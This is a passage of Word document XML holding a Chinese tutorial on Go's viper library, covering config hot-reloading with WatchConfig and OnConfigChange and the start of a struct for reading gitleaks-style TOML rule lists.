      </w:r>
    </w:p>
    <w:p w14:paraId="2009DE20" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="359B3596" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Run tme</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>时盯配置文件是否有异动热加载配置。因此不需要重启服务器，就能让配置生效。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E638BAB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BF1E03B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>viper.OnConfigChange(func(e fsnotify.Event) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="393431B8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>fmt.Println("Config file changed:", e.Name)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2264241B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C9E57D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>viper.WatchConfig()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A75E9C4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5895D9B2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07CD652C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>package main</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DAF04DA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E59FE0D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>import (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D74376E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  "fmt"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7F306E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  "log"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3071D204" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  "time"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1992A611" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29F9A003" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  "github.com/spf13/viper"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="687C51A7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04556736" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B65398A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>func main() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="555D4271" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  viper.SetConfigName("config")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75CAC4AF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  viper.SetConfigType("toml")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE87365" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  viper.AddConfigPath(".")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="369FD36B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  err := viper.ReadInConfig()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C7E6EBD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  if err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="096B0B5A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    log.Fatal("read config failed: %v", err)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A9F2222" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75ED5328" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C9C1972" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  viper.WatchConfig()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B890440" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52750349" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  fmt.Println("redis port before sleep: ", viper.Get("redis.port"))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E0BE10E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  time.Sleep(time.Second * 10)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C5D89C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  fmt.Println("redis port after sleep: ", viper.Get("redis.port"))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3913C2B2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46210154" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B3CC51C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:widowControl/>
      </w:pPr>
      <w:r>
        <w:t>只需要调用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>viper.WatchConfig</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">viper </w:t>
      </w:r>
      <w:r>
        <w:t>会自动监听配置修改。如果有修改，重新加载的配置。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6562BBF4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:widowControl/>
      </w:pPr>
      <w:r>
        <w:t>上面程序中，我们先打印</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>redis.port</w:t>
      </w:r>
      <w:r>
        <w:t>的值，然后</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>Sleep</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 10s</w:t>
      </w:r>
      <w:r>
        <w:t>。在这期间修改配置中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>redis.port</w:t>
      </w:r>
      <w:r>
        <w:t>的值，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>Sleep</w:t>
      </w:r>
      <w:r>
        <w:t>结束后再次打印。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>发现打印出修改后的值：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D1785A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:widowControl/>
      </w:pPr>
      <w:r>
        <w:t>另外，还可以为配置修改增加一个回调：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A02E012" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:widowControl/>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>viper.OnConfigChange(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>func(e fsnotify.Event)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B5B0867" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:widowControl/>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">  fmt.Printf(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>"Config file:%s Op:%s\n"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>, e.Name, e.Op)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5E268B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:widowControl/>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF97524" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:widowControl/>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="390FCD54" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:widowControl/>
      </w:pPr>
      <w:r>
        <w:t>这样文件修改时会执行这个回调。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E44F50B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:widowControl/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">viper </w:t>
      </w:r>
      <w:r>
        <w:t>使用</w:t>
      </w:r>
      <w:hyperlink r:id="rId114" w:tgtFrame="_blank" w:tooltip="https://github.com/fsnotify/fsnotify" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a5"/>
          </w:rPr>
          <w:t>fsnotify</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>这个库来实现监听文件修改的功能。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2679858F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>gitleaks</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>案例</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>读取</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>[[Rule]]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这种列表的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>toml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F057B45" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如这里结构体写的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Rules </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3056C203" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>type ViperConfig struct {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B5DAC8F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>Description string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B197A8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>Extend      Extend</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F13DA3A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Rules       []struct</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A7C6DF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>ID          string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A85571E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>Description string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="586BE846" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>Entropy     float64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EBA9F1F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>SecretGroup int</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18772C00" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>Regex       string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EDFB745" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>Keywords    []string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57869F8B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>Path        string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A36A4A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>Tags        []string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32318E12" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="322425AD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>Allowlist struct {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC62F39" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>Regexes   []string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="610E5B39" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>Paths     []string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ECE786A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>Commits   []string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51EE6B20" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>StopWords []string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429084C4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D421A63" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
